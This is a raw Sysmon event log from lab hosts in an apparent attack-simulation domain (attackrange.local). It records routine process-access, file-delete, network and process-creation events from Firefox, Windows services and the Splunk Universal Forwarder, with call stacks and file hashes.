08:00:32.599{58E9C193-AE68-615A-C800-00000000FC01}45484124C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a10|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF8039A66F8A8)|UNKNOWN(FFFFA5175A805B48)|UNKNOWN(FFFFA5175A805CC7)|UNKNOWN(FFFFA5175A800351)|UNKNOWN(FFFFA5175A801D1A)|UNKNOWN(FFFFA5175A7FFFD6)|UNKNOWN(FFFFF8039A387103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000106804Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:32.599{58E9C193-AE68-615A-C800-00000000FC01}45484124C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+554f1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF8039A66F8A8)|UNKNOWN(FFFFA5175A805B48)|UNKNOWN(FFFFA5175A805CC7)|UNKNOWN(FFFFA5175A800351)|UNKNOWN(FFFFA5175A801D1A)|UNKNOWN(FFFFA5175A7FFFD6)|UNKNOWN(FFFFF8039A387103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106803Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:32.583{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+bed195|C:\Program Files\Mozilla Firefox\xul.dll+bf373b 10341000x8000000000000000106802Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:32.583{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+bed195|C:\Program Files\Mozilla Firefox\xul.dll+bf373b 10341000x8000000000000000106801Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:32.583{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+bed195|C:\Program Files\Mozilla Firefox\xul.dll+bf373b 23542300x8000000000000000106800Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:32.530{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C94E5B610E47152B6C0ABDF59E37B40,SHA256=30E0766E09618A443F0EAB943CA9121EA49DB78832E14F46C0642E119D048051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083174Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.650{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB0F97720809C39E6CF4EBE74236C93,SHA256=BC350870B1FADBDFA7AAE0474DA9F4316D1753D70CBBF68BDEF52BFF072CCA1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106799Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:32.130{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F20334C9190B1639DB8244684DEB9EB8,SHA256=AE9E5D19B9BA73958A637D9BAA56D0DBA26BF514018D47A9450125ACAEAA1BD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083173Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.400{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6A489834EEA8A810942A33CDFCEB9B0,SHA256=59A2FA00F228F08172E29D7BF4705B113009832433CC0521616F3779EC6E592B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083172Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.400{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF36DAB4CCCB062C9C9D917CA141FAFD,SHA256=EAE5B323DD06C4B23D22A503F6B88CC1FB6392CB85AB032A754F11F395EFE26D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083171Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.244{2FDD8D40-B4A0-615A-8901-00000000FD01}6563948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000083170Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:29.377{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50145-false10.0.1.12-8089- 10341000x800000000000000083169Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4A0-615A-8901-00000000FD01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083168Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083167Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083166Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083165Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083164Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083163Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083162Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083161Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083160Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083159Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B4A0-615A-8901-00000000FD01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083158Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.041{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4A0-615A-8901-00000000FD01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083157Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:32.042{2FDD8D40-B4A0-615A-8901-00000000FD01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083188Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.681{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84EDB81945DDB5DF94137A1A07FDB7BE,SHA256=A4B5FB51F9974F2D8CA946AFB0EBA2D81A08E7C26B1CC4BE584EA271AE61AD16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106806Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:33.545{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E92716B1B2EE9D55FFCF49C67EC459F6,SHA256=98A127B963784CF88CCB78AC4F6F6110AEA1D6C703300C6C6812A6E1CFFA441B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083187Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4A1-615A-8A01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083186Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 